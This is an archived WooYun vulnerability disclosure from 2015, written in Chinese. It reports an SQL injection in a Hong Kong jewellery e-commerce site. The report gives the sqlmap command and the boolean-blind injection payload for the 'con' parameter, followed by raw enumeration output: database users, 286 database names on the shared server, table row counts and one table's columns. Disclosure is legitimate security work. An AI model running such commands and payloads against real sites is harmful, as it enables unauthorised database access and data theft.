当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0153709

漏洞标题:淘鉆網某處存在SQL註入漏洞(286個庫/6000條系統信息泄露)(香港地區)

相关厂商:淘鉆網

漏洞作者: 路人甲

提交时间:2015-11-12 08:19

修复时间:2016-01-11 15:32

公开时间:2016-01-11 15:32

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:10

漏洞状态:已交由第三方合作机构(hkcert香港互联网应急协调中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-11-12: 细节已通知厂商并且等待厂商处理中
2015-11-24: 厂商已经确认,细节仅向厂商公开
2015-12-04: 细节向核心白帽子及相关领域专家公开
2015-12-14: 细节向普通白帽子公开
2015-12-24: 细节向实习白帽子公开
2016-01-11: 细节向公众公开

简要描述:

淘鑽的成立,是透過網上商城的媒介,連接至香港一間創辦創辦多年並與員工、供應商及商業夥伴聯成密切合作的團隊公司,我們身後有穩定的股東支持,這些股東在鑽石及珠寶行業從事多年並擁有寵大的行業關係,他們決意集在一起,是為了著力推廣網上直銷的使命,推廣至世界各地。

详细说明:

地址:http://**.**.**.**/sys_msg/msgsh.aspx?con=%E9%85%8D%E9%80%81%E7%89%A9%E6%B5%81

python sqlmap.py -u "http://**.**.**.**/sys_msg/msgsh.aspx?con=%E9%85%8D%E9%80%81%E7%89%A9%E6%B5%81" -p con --technique=B --random-agent --batch --dbs --count

漏洞证明:

---
web server operating system: Windows 2008 or Vista
web application technology: ASP.NET, ASP.NET 2.0.50727, Microsoft IIS 7.0
back-end DBMS: Microsoft SQL Server 2005
current user:    'sq_longyf1'
current user is DBA:    False
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: con (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: con=%E9%85%8D%E9%80%81%E7%89%A9%E6%B5%81' AND 3071=3071 AND 'Zmkb'='Zmkb
---
web server operating system: Windows 2008 or Vista
web application technology: ASP.NET, ASP.NET 2.0.50727, Microsoft IIS 7.0
back-end DBMS: Microsoft SQL Server 2005
database management system users [2]:
[*] sa
[*] sq_longyf1
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: con (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: con=%E9%85%8D%E9%80%81%E7%89%A9%E6%B5%81' AND 3071=3071 AND 'Zmkb'='Zmkb
---
web server operating system: Windows 2008 or Vista
web application technology: ASP.NET, ASP.NET 2.0.50727, Microsoft IIS 7.0
back-end DBMS: Microsoft SQL Server 2005
available databases [286]:
[*] master
[*] model
[*] msdb
[*] sq_a123456789
[*] sq_admin235
[*] sq_aiqinghaiwz
[*] sq_ajoe2013
[*] sq_alitravelcom
[*] sq_anxingqc
[*] sq_aofeng520
[*] sq_aojindate
[*] sq_audelo1
[*] sq_audelo2
[*] sq_audelo3
[*] sq_audelo4
[*] sq_b3value
[*] sq_baiyue
[*] sq_bakontools
[*] sq_baodbfw
[*] sq_baoerji
[*] sq_baojingzk
[*] sq_beidetz
[*] sq_beituoqy
[*] sq_bjzgtcs2014
[*] sq_blackeye
[*] sq_bocaicws
[*] sq_bomuzz
[*] sq_bsjxinwang
[*] sq_byyyzx
[*] sq_caichaoji
[*] sq_caiyuan
[*] sq_cdwuxiyun
[*] sq_chananzszy
[*] sq_chenguanry
[*] sq_chentong
[*] sq_chijiasw
[*] sq_chileijx
[*] sq_chinanijiu
[*] sq_chuangyuanzb
[*] sq_cjobcn
[*] sq_cocohanshidz
[*] sq_cqkfdl
[*] sq_czlkdz
[*] sq_daiyhb
[*] sq_datongmat123
[*] sq_db2011
[*] sq_detaby
[*] sq_dgzqlove168
[*] sq_dianjx
[*] sq_dianlan
[*] sq_dianwang9
[*] sq_dingpincy
[*] sq_dongyangzl
[*] sq_dubeisgjwl
[*] sq_emba2014
[*] sq_enxuepo
[*] sq_etechc
[*] sq_ezhuanjing
[*] sq_fanzhoujz
[*] sq_favedb
[*] sq_fjzykj2013
[*] sq_fushitong
[*] sq_gaoxin
[*] sq_genxindz
[*] sq_ggthing
[*] sq_grandhuntdb
[*] sq_guanxinjz
[*] sq_guanxinsh
[*] sq_guke91
[*] sq_guokuanwm
[*] sq_haichao
[*] sq_haitawz
[*] sq_hangkong2014
[*] sq_hanjinzmqy
[*] sq_haohanwl
[*] sq_haolutongqc
[*] sq_haoyuejm
[*] sq_harmonyhome
[*] sq_hb120973135zj
[*] sq_hejiabei
[*] sq_hengjin
[*] sq_hengjin1
[*] sq_hk50m109net
[*] sq_hk50m109net2
[*] sq_hknet001
[*] sq_hnpc2013
[*] sq_hongbangsx
[*] sq_hongwoxin
[*] sq_htcmallwin
[*] sq_huagongyanjiu
[*] sq_huagumc
[*] sq_huaiyuedt
[*] sq_huanglyw
[*] sq_huanjing
[*] sq_huawan
[*] sq_huaxiansh
[*] sq_huaye52
[*] sq_hunandiannao
[*] sq_huxiangqy
[*] sq_jch888
[*] sq_jiafumy
[*] sq_jianai
[*] sq_jiaoshizulin
[*] sq_jingchangzc
[*] sq_jinhemaoyi
[*] sq_jinhengmy
[*] sq_jinkuihuatz
[*] sq_jisuopp3
[*] sq_jiugeyq
[*] sq_jixhye
[*] sq_jljxqy
[*] sq_jpshop
[*] sq_Jsz140322G
[*] sq_Jsz140322wj
[*] sq_juou08
[*] sq_justintime
[*] sq_kaidelun
[*] sq_kardanland
[*] sq_kingwoodmodel
[*] sq_kongjianc3
[*] sq_laidunjiaoyu
[*] sq_langshighjz
[*] sq_lanruimaoyi
[*] sq_legougift1
[*] sq_leifujiguang
[*] sq_lida888
[*] sq_lihejiudian
[*] sq_linlixin
[*] sq_lishenzb
[*] sq_liuliang01
[*] sq_lkylzs
[*] sq_lonansq
[*] sq_longkenjx
[*] sq_longkenjx2
[*] sq_longyf1
[*] sq_luo20140426
[*] sq_luohaha
[*] sq_luozong0077
[*] sq_lvkasjiaju
[*] sq_lvweizhao2
[*] sq_lwscyxcom
[*] sq_lxw111108
[*] sq_lyjnews123
[*] sq_maiduo
[*] sq_maifutz
[*] sq_maigao
[*] sq_maohuanjd
[*] sq_maopusy
[*] sq_maotaihm
[*] sq_moudijx
[*] sq_nanyangwz
[*] sq_nbcwghbl
[*] sq_newbiaodi23
[*] sq_newdatong222
[*] sq_newdatong333
[*] sq_nieyaxin
[*] sq_nkxdl999s
[*] sq_nnde123
[*] sq_ofitech
[*] sq_okelodb
[*] sq_pinguzx
[*] sq_platous
[*] sq_qiaoqiang
[*] sq_qimaihuanbao
[*] sq_qixionghg
[*] sq_rongxin2013
[*] sq_rongzhujz
[*] sq_ruitenggg
[*] sq_ruxinwh
[*] sq_saiting
[*] sq_sd2015
[*] sq_sengao
[*] sq_sennengkj
[*] sq_shangyou
[*] sq_shenmao
[*] sq_shidanliwj
[*] sq_shidanwudao
[*] sq_shipgruop2
[*] sq_shmx56
[*] sq_shslgg
[*] sq_shujijiaotong
[*] sq_shunma
[*] sq_shuwen
[*] sq_shuxiangmd
[*] sq_sijishipin
[*] sq_sinee2013hk
[*] sq_siweizhanlan
[*] sq_smwcn120
[*] sq_soft369
[*] sq_songlizy
[*] sq_sq20130524sq
[*] sq_sql2005
[*] sq_stcmdb
[*] sq_suntong2015
[*] sq_suotingcz
[*] sq_suoxiangtwen
[*] sq_sushan2
[*] sq_tailingood124
[*] sq_taisheng2
[*] sq_taishengzw
[*] sq_tcs2015
[*] sq_tezhengfs
[*] sq_tianbensy
[*] sq_tjwangxiao
[*] sq_tongjijz
[*] sq_top580
[*] sq_toupiao
[*] sq_tuolawz
[*] sq_tuoyiceshi
[*] sq_usdachina
[*] sq_wdxh123
[*] sq_webfbdata
[*] sq_weideng2015
[*] sq_weimeijj
[*] sq_weiqizhileng
[*] sq_weixin2014
[*] sq_wojiakeji
[*] sq_wugannade
[*] sq_wuxijingmi
[*] sq_wuxikefu
[*] sq_xiamengyanjin
[*] sq_xiamengyj
[*] sq_xiandaihkzl
[*] sq_xiandaikq
[*] sq_xiandaimc
[*] sq_xiandaipf
[*] sq_xiandaishi
[*] sq_xiandaiyq
[*] sq_xiandaizhanl
[*] sq_xiandaizhanla
[*] sq_xiandao
[*] sq_xiangrui
[*] sq_xiangyingsy
[*] sq_xiaoxiao
[*] sq_xiazai
[*] sq_xincai
[*] sq_xinfphuang
[*] sq_xingbeish
[*] sq_xingchengwl
[*] sq_xinhuasql
[*] sq_xinjiezhanlan
[*] sq_xinkailuo8800
[*] sq_xinshimy
[*] sq_xinttuotz
[*] sq_xuanjuxin
[*] sq_xunguangny
[*] sq_xycgcom2
[*] sq_yangwz
[*] sq_yanyinyy
[*] sq_yechenxin
[*] sq_yidaosh
[*] sq_yifanhj
[*] sq_yihefm
[*] sq_yingbaizh
[*] sq_yingtzc
[*] sq_yingyiwl
[*] sq_yinzhijie
[*] sq_yishengxs
[*] sq_yjqycyxh
[*] sq_yjqyg1
[*] sq_yjqyy1
[*] sq_yongdiny
[*] sq_yongtingbz
[*] sq_youchuang
[*] sq_ysl55webdb
[*] sq_yuandajs
[*] sq_yuanguang
[*] sq_yudunyeya
[*] sq_yuejiaq
[*] sq_yuhehx
[*] sq_yujishiye
[*] sq_yumeng31
[*] sq_yuxiangjr
[*] sq_zhangshangysg
[*] sq_zhaoqing
[*] sq_zhelonggg
[*] sq_zhenhuijr
[*] sq_zhgkyy
[*] sq_zhiahl
[*] sq_zhidetouzi
[*] sq_zhixiangqy
[*] sq_zhonggong
[*] sq_zjmj119
[*] sq_zsjxtest
[*] sq_zwtdingdan
[*] tempdb
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: con (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: con=%E9%85%8D%E9%80%81%E7%89%A9%E6%B5%81' AND 3071=3071 AND 'Zmkb'='Zmkb
---
web server operating system: Windows 2008 or Vista
web application technology: ASP.NET, ASP.NET 2.0.50727, Microsoft IIS 7.0
back-end DBMS: Microsoft SQL Server 2005
current database:    'sq_longyf1'
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: con (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: con=%E9%85%8D%E9%80%81%E7%89%A9%E6%B5%81' AND 3071=3071 AND 'Zmkb'='Zmkb
---
web server operating system: Windows 2008 or Vista
web application technology: ASP.NET, ASP.NET 2.0.50727, Microsoft IIS 7.0
back-end DBMS: Microsoft SQL Server 2005
Database: sq_longyf1
+------------------+---------+
| Table            | Entries |
+------------------+---------+
| dbo.tbl_zs       | 5887    |
| dbo.T_District   | 2841    |
| dbo.tbl_sp       | 418     |
| dbo.v_sp         | 418     |
| dbo.T_City       | 371     |
| dbo.tbl_gk       | 192     |
| dbo.tbl_vip      | 192     |
| dbo.v_gk         | 192     |
| dbo.v_vip        | 192     |
| dbo.tbl_sjly     | 86      |
| dbo.tbl_gwc      | 66      |
| dbo.tbl_xxlm     | 66      |
| dbo.v_gwc        | 66      |
| dbo.tbl_xx       | 57      |
| dbo.tbl_yhzqx    | 41      |
| dbo.tbl_dd_jymx  | 35      |
| dbo.tbl_sj       | 35      |
| dbo.v_dd_jymx    | 35      |
| dbo.T_Province   | 34      |
| dbo.tbl_dd       | 32      |
| dbo.test         | 27      |
| dbo.tbl_qx       | 20      |
| dbo.tbl_jt       | 12      |
| dbo.tbl_xx_index | 11      |
| dbo.tbl_lq       | 8       |
| dbo.tbl_splx     | 6       |
| dbo.tbl_viplx    | 6       |
| dbo.tbl_gg       | 4       |
| dbo.tbl_sjcktp   | 4       |
| dbo.tbl_user     | 4       |
| dbo.v_user       | 4       |
| dbo.tbl_dz       | 3       |
| dbo.tbl_yhz      | 3       |
| dbo.tbl_zxyh     | 3       |
| dbo.v_dz         | 3       |
| dbo.tbl_config   | 2       |
| dbo.tbl_hd       | 2       |
| dbo.tbl_lqqq     | 2       |
| dbo.tbl_mylq     | 2       |
| dbo.v_mylq       | 2       |
| dbo.tbl_kfzt     | 1       |
| dbo.tbl_vis      | 1       |
+------------------+---------+


Database: sq_longyf1
Table: tbl_zs
[22 columns]
+--------+----------+
| Column | Type     |
+--------+----------+
| id     | int      |
| tj     | varchar  |
| zsbxbj | varchar  |
| zsdc   | varchar  |
| zsfbr  | varchar  |
| zsfbsj | datetime |
| zsjd   | varchar  |
| zsjg   | decimal  |
| zsms   | varchar  |
| zspg   | varchar  |
| zsqg   | varchar  |
| zssd   | varchar  |
| zstm   | varchar  |
| zsxsqy | varchar  |
| zsxz   | varchar  |
| zsyg   | varchar  |
| zsys   | varchar  |
| zsyslx | varchar  |
| zszl   | decimal  |
| zszsbh | varchar  |
| zszslx | varchar  |
| zt     | varchar  |
+--------+----------+

修复方案:

上WAF。

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:13

确认时间:2015-11-24 18:02

厂商回复:

已報告給網站聯絡人

最新状态:

暂无

漏洞评价:

评价